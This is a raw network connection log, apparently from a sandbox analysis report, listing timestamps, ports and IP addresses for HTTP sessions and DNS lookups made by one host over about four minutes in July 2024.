                            Jul 16, 2024 07:24:18.274279118 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:18.276628971 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:18.281625986 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.765765905 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.765811920 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.765846968 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.766005993 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.766629934 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.766675949 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.766710997 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.766745090 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.766803026 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.766868114 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.767163992 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.767199039 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.767229080 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.767232895 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.767463923 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.771111012 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.771239996 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.771423101 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.852380037 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.852547884 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.852583885 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.852669001 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.852823019 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853079081 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853236914 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.853254080 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853288889 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853322029 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853373051 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.853482008 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.853750944 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853785038 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853848934 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853883028 CEST8049777172.67.196.1192.168.2.4
                            Jul 16, 2024 07:24:19.853912115 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.853986979 CEST4977780192.168.2.4172.67.196.1
                            Jul 16, 2024 07:24:19.854589939 CEST8049777172.67.196.1192.168.2.4
Jul 16, 2024 07:24:19.854733944 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.854998112 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855031013 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855066061 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855096102 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.855096102 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.855523109 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855648994 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.855717897 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855750084 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855783939 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.855815887 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.855818987 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.857635021 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.857762098 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.857777119 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.857892990 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.938874006 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.938987017 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939004898 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939028978 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.939260960 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939280033 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939330101 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.939722061 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939739943 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939774036 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.939783096 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.939824104 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.940350056 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.940367937 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.940386057 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.940419912 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.940443993 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.940485954 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.941262960 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.941282034 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.941314936 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.941333055 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.941334963 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.941349983 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.941396952 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.942197084 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.942217112 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.942250013 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.942267895 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.942272902 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.942297935 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.943100929 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.943120003 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.943151951 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.943167925 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.943171024 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.943212032 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.944013119 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944031954 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944047928 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944050074 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.944067001 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944101095 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944111109 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.944150925 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.944890976 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944931030 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944948912 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.944981098 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.945005894 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.945039988 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.945854902 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.945873976 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.945907116 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.945921898 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.945925951 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.945943117 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.945990086 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.946526051 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.946547031 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:19.946598053 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.950257063 CEST | 49777 | 80 | 192.168.2.4 | 172.67.196.1
Jul 16, 2024 07:24:19.955045938 CEST | 80 | 49777 | 172.67.196.1 | 192.168.2.4
Jul 16, 2024 07:24:25.423715115 CEST | 49778 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:25.428703070 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:25.429820061 CEST | 49778 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:25.435718060 CEST | 49778 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:25.443897963 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:25.896580935 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:25.896696091 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:25.903731108 CEST | 49778 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:26.939846039 CEST | 49778 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:27.958405018 CEST | 49779 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:27.970258951 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:27.970346928 CEST | 49779 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:27.972400904 CEST | 49779 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:27.977350950 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:28.423260927 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:28.423280001 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:28.423350096 CEST | 49779 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:29.485615015 CEST | 49779 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:30.504514933 CEST | 49780 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:30.509742022 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.509844065 CEST | 49780 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:30.512422085 CEST | 49780 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:30.517409086 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517468929 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517482996 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517494917 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517505884 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517688990 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517700911 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517712116 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.517744064 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.956948996 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.956999063 CEST | 80 | 49780 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:30.957268000 CEST | 49780 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:32.016750097 CEST | 49780 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:33.035734892 CEST | 49781 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:33.040796995 CEST | 80 | 49781 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:33.043867111 CEST | 49781 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:33.047720909 CEST | 49781 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:33.052721977 CEST | 80 | 49781 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:33.495090961 CEST | 80 | 49781 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:33.495145082 CEST | 80 | 49781 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:33.495402098 CEST | 49781 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:33.499726057 CEST | 49781 | 80 | 192.168.2.4 | 64.46.102.70
Jul 16, 2024 07:24:33.504626989 CEST | 80 | 49781 | 64.46.102.70 | 192.168.2.4
Jul 16, 2024 07:24:38.543243885 CEST | 49782 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:38.548120022 CEST | 80 | 49782 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:38.548190117 CEST | 49782 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:38.550257921 CEST | 49782 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:38.555114031 CEST | 80 | 49782 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:39.032862902 CEST | 80 | 49782 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:39.039736986 CEST | 49782 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:40.063590050 CEST | 49782 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:40.068687916 CEST | 80 | 49782 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:41.082190990 CEST | 49783 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:41.221940994 CEST | 80 | 49783 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:41.222285032 CEST | 49783 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:41.226093054 CEST | 49783 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:41.230870962 CEST | 80 | 49783 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:41.691652060 CEST | 80 | 49783 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:41.698275089 CEST | 49783 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:42.735626936 CEST | 49783 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:42.753082037 CEST | 80 | 49783 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.754091024 CEST | 49784 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:43.759284973 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.761931896 CEST | 49784 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:43.766119003 CEST | 49784 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:43.776472092 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.776926041 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.776971102 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.777324915 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.777424097 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.777451992 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.777479887 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.777508020 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:43.777534962 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:44.219959021 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:44.220030069 CEST | 49784 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:45.266788960 CEST | 49784 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:45.272085905 CEST | 80 | 49784 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:46.285514116 CEST | 49785 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:46.290601015 CEST | 80 | 49785 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:46.290668964 CEST | 49785 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:46.292792082 CEST | 49785 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:46.297702074 CEST | 80 | 49785 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:46.751651049 CEST | 80 | 49785 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:46.751707077 CEST | 80 | 49785 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:46.751790047 CEST | 49785 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:46.754673958 CEST | 49785 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:24:46.759512901 CEST | 80 | 49785 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:24:52.186522961 CEST | 49786 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:52.191437960 CEST | 80 | 49786 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:52.191513062 CEST | 49786 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:52.193397999 CEST | 49786 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:52.198168993 CEST | 80 | 49786 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:52.797907114 CEST | 80 | 49786 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:52.797923088 CEST | 80 | 49786 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:52.798012972 CEST | 49786 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:53.707792044 CEST | 49786 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:54.723507881 CEST | 49787 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:54.728914976 CEST | 80 | 49787 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:54.728984118 CEST | 49787 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:54.731209040 CEST | 49787 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:54.736059904 CEST | 80 | 49787 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:55.313714027 CEST | 80 | 49787 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:55.313745975 CEST | 80 | 49787 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:55.314815044 CEST | 49787 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:56.235600948 CEST | 49787 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:57.255846024 CEST | 49788 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:57.260776997 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.263904095 CEST | 49788 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:57.267774105 CEST | 49788 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:57.272768021 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.272799969 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.272849083 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.272866011 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.272877932 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.272972107 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.273004055 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.273031950 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.273058891 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.936101913 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.937226057 CEST | 80 | 49788 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:57.937330008 CEST | 49788 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:58.766763926 CEST | 49788 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:59.786637068 CEST | 49789 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:59.792413950 CEST | 80 | 49789 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:24:59.794187069 CEST | 49789 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:59.798352003 CEST | 49789 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:24:59.803293943 CEST | 80 | 49789 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:25:00.368628025 CEST | 80 | 49789 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:25:00.368678093 CEST | 80 | 49789 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:25:00.368756056 CEST | 49789 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:25:00.371581078 CEST | 49789 | 80 | 192.168.2.4 | 23.105.215.248
Jul 16, 2024 07:25:00.376395941 CEST | 80 | 49789 | 23.105.215.248 | 192.168.2.4
Jul 16, 2024 07:25:05.829782963 CEST | 49790 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:25:05.834737062 CEST | 80 | 49790 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:25:05.837243080 CEST | 49790 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:25:05.837614059 CEST | 49790 | 80 | 192.168.2.4 | 3.33.130.190
Jul 16, 2024 07:25:05.842777967 CEST | 80 | 49790 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:25:06.302624941 CEST | 80 | 49790 | 3.33.130.190 | 192.168.2.4
Jul 16, 2024 07:25:06.302696943 CEST | 49790 | 80 | 192.168.2.4 | 3.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 16, 2024 07:21:44.155839920 CEST | 57046 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:21:44.171042919 CEST | 53 | 57046 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:21:59.723273039 CEST | 59961 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:21:59.732860088 CEST | 53 | 59961 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:22:07.785259962 CEST | 49200 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:22:07.798978090 CEST | 53 | 49200 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:22:20.958830118 CEST | 51417 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:22:21.253191948 CEST | 53 | 51417 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:22:34.493822098 CEST | 64235 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:22:34.507065058 CEST | 53 | 64235 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:22:48.129128933 CEST | 53231 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:22:48.144511938 CEST | 53 | 53231 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:23:01.411633015 CEST | 61787 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:23:02.061860085 CEST | 53 | 61787 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:23:16.176028013 CEST | 61011 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:23:16.837920904 CEST | 53 | 61011 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:23:30.067934036 CEST | 55969 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:23:30.101463079 CEST | 53 | 55969 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:23:43.849036932 CEST | 53801 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:23:43.951368093 CEST | 53 | 53801 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:23:57.287734032 CEST | 53584 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:23:57.302839041 CEST | 53 | 53584 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:24:10.582833052 CEST | 56146 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:24:10.600626945 CEST | 53 | 56146 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:24:24.979728937 CEST | 54114 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:24:25.417280912 CEST | 53 | 54114 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:24:38.504750013 CEST | 56535 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:24:38.540661097 CEST | 53 | 56535 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:24:51.770481110 CEST | 50600 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:24:52.184094906 CEST | 53 | 50600 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 07:25:05.817091942 CEST | 52229 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 07:25:05.827225924 CEST | 53 | 52229 | 1.1.1.1 | 192.168.2.4
